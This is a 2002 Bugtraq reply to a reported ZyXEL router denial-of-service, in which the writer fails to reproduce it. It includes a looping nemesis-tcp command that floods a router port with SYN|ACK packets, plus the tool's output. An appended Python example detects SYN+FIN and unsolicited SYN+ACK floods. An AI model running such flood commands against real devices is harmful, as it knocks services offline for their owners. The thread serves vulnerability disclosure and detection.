Re [BUGTRAQ] : ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

From: Rich Henning (seclstsat_private)
Date: Mon Jun 17 2002 - 10:13:57 PDT


    Sorry moderators, I accidentally replied with this to bugtraq, but it
    should probably have gone to vuln-dev.  My apologies.
    
    On Mon, Jun 17, 2002 at 02:59:11PM +0200, Kistler Ueli wrote:
    > ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets.
    > It is possible to send a packet that will make the router's services
    > unavailable (Telnet & FTP; DHCP service not tested).
    > Network traffic isn't stopped.
    > 
    > Possibly more ZyNOS based routers are vulnerable. Please reply if you
    > find any other ZyNOS based router vulnerable.
    
    I was unable to reproduce this behavior on my Zyxel 643 ADSL router,
    even under extremely heavy (continuous) SYN|ACK packet flooding to
    several ports.  An excerpt of one such test session follows, concluded
    with ZyNOS information.
    
    Immediately after single-packet, during continuous bombardment, and
    afterwards, I was able to access the configuration menu via telnet.
    
    The FTP and HTTP services are disabled on my router, and the only
    firewall rule is to protect the SNMP service of the Zyxel itself from
    the WAN side, as I have a Linux 2.4/netfilter box that protects the LAN
    side of the internal network.
    
    
    Thanks for the heads-up Kistler!
    
    ---
    # while /bin/true; do nemesis-tcp -v -fS -fA -S xxx.xxx.xxx.xxx -D yyy.yyy.yyy.yyy -y 40023 -d eth0; done
    
     [ ...repeatedly... ]
    
    TCP Packet Injection -=- The NEMESIS Project 1.32
    Copyright (C) 1999, 2000, 2001 Mark Grimes <obecianat_private>
    Portions copyright (C) 2001 Jeff Nathan <jeffat_private>
    
    [IP]  xxx.xxx.xxx.xxx > yyy.yyy.yyy.yyy 
    [MAC]  00:90:27:62:5A:D6 > 0D:0E:0A:0D:00:01
    [Ports] 42069 > 40023
    [Flags]  SYN ACK 
    [TCP Urgent Pointer] 2048
    [Window Size] 512
    [ACK number] 420
    [Sequence number] 420
    [IP ID] 0
    [IP TTL] 254
    [IP TOS] 0x18
    [IP Frag] 0x4000
    [IP Options] 
    Wrote 54 byte TCP packet through linktype 1
    
    TCP Packet Injected
    
    ---
    
    ZyNOS F/W Version: V2.50(AY.1) | 9/19/2001
    ADSL Chipset Vendor: Alcatel, Version  3.6.70
    Standard: G.DMT
    
    -- 
    [ rich henning      ]                                             /"\
    [ henninrpat_private ]                                             \ /
                                                                       X
    support the ascii ribbon campaign against html e-mail             / \
    
    pgp: http://diss0nance.lawngnome.org/pgp_public.txt
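The test session above sends SYN|ACK segments that answer no outbound SYN, and the original report also concerns SYN|FIN segments. The following is an added example, not part of the mailing-list thread or of any ZyXEL or Nemesis code: a small detector that decodes the fixed TCP header, names the flag combination, and raises an alert for SYN+FIN segments immediately and for a source that sends more than a threshold of unsolicited SYN+ACK segments (ones that match no SYN the monitored host sent). The traffic it runs over is constructed inline; the ports, sequence/ack numbers and window size for the flood mirror the Nemesis excerpt above, while the IP addresses and the `FlagAnomalyDetector` class and its threshold are assumptions made for the example.

```python
import struct
from collections import Counter

# TCP flag bits as laid out in the low six bits of the header's data-offset/flags field.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def parse_tcp_header(segment: bytes) -> dict:
    """Decode the fixed 20-byte TCP header: ports, seq/ack numbers, flag bits, window."""
    if len(segment) < 20:
        raise ValueError("TCP header truncated")
    sport, dport, seq, ack, off_flags, window, _cksum, _urg = struct.unpack(
        "!HHIIHHHH", segment[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x3F, "window": window}


def classify_flags(flags: int) -> str:
    """Name the flag combination; SYN+FIN and flag-less segments never occur in a valid handshake."""
    if flags & SYN and flags & FIN:
        return "invalid:SYN+FIN"
    if flags == 0:
        return "invalid:null"
    if flags & SYN and flags & ACK:
        return "SYN+ACK"
    if flags & SYN:
        return "SYN"
    if flags & RST:
        return "RST"
    return "data"


def build_tcp_header(sport, dport, flags, seq=0, ack=0, window=512) -> bytes:
    """Constructed sample header (data offset 5, no options, zero checksum) used to feed the detector."""
    off_flags = (5 << 12) | flags
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, off_flags, window, 0, 0)


class FlagAnomalyDetector:
    """Hypothetical detector: alerts on SYN+FIN at once, and on a source whose
    unsolicited SYN+ACK count (no matching outbound SYN) reaches `threshold`."""

    def __init__(self, threshold=20):
        self.threshold = threshold
        self.pending_syns = set()      # (local_ip, local_port, remote_ip, remote_port) of SYNs we sent
        self.unsolicited = Counter()   # unsolicited SYN+ACK segments per remote source IP
        self.alerted = set()           # sources already reported, to avoid repeating the alert

    def observe(self, direction, src_ip, dst_ip, segment):
        """Feed one segment ('out' = sent by the monitored host, 'in' = received); returns an alert or None."""
        hdr = parse_tcp_header(segment)
        kind = classify_flags(hdr["flags"])
        if direction == "out":
            if kind == "SYN":
                self.pending_syns.add((src_ip, hdr["sport"], dst_ip, hdr["dport"]))
            return None
        if kind.startswith("invalid:"):
            return f"{kind} from {src_ip}:{hdr['sport']} to {dst_ip}:{hdr['dport']}"
        if kind == "SYN+ACK":
            key = (dst_ip, hdr["dport"], src_ip, hdr["sport"])
            if key in self.pending_syns:
                self.pending_syns.discard(key)   # legitimate reply to our own SYN
                return None
            self.unsolicited[src_ip] += 1
            if self.unsolicited[src_ip] >= self.threshold and src_ip not in self.alerted:
                self.alerted.add(src_ip)
                return (f"unsolicited SYN+ACK flood from {src_ip} "
                        f"({self.unsolicited[src_ip]} segments)")
        return None


def run_sample() -> list:
    """Constructed traffic: one legitimate handshake reply, a SYN+FIN probe, then a SYN+ACK flood."""
    det = FlagAnomalyDetector(threshold=5)
    events = [
        ("out", "10.0.0.5", "203.0.113.7", build_tcp_header(51000, 80, SYN, seq=1)),
        ("in", "203.0.113.7", "10.0.0.5", build_tcp_header(80, 51000, SYN | ACK, seq=900, ack=2)),
        ("in", "198.51.100.9", "10.0.0.1", build_tcp_header(42069, 23, SYN | FIN)),
    ]
    # Six copies of the kind of segment the Nemesis loop above injects: 42069 > 40023, SYN ACK, seq/ack 420.
    events += [("in", "198.51.100.9", "10.0.0.1",
                build_tcp_header(42069, 40023, SYN | ACK, seq=420, ack=420))] * 6
    alerts = []
    for ev in events:
        alert = det.observe(*ev)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

Run it as a script and it prints two alerts: the SYN+FIN segment is reported on arrival, and the flood source is reported once, when its fifth unsolicited SYN+ACK arrives; the solicited SYN+ACK from 203.0.113.7 is matched against the recorded outbound SYN and produces nothing. On a real capture the same two checks would be fed from a pcap reader, with the threshold tuned to the host's normal connection rate.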
    